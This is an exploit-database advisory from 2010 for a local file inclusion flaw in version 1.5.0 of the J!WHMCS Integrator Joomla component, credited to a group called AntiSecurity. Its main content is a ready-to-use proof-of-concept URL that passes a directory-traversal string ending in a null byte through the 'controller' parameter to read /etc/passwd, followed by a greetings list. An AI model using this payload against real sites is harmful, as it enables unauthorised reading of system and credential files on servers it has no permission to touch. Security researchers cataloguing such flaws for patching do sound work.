Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion

EDB-ID:

12083




Platform:

PHP

Date:

2010-04-06


============================================================================================================


  [o] Joomla Component J!WHMCS Integrator Local File Inclusion Vulnerability

       Software : com_jwhmcs version 1.5.0
       Vendor   : https://client.gohigheris.com/
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[dot]antisecurity[dot]org
       Home     : http://antisecurity.org/


============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_jwhmcs&controller=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00


============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


============================================================================================================


  [o] April 06 2010 - GMT +07:00 Jakarta, Indonesia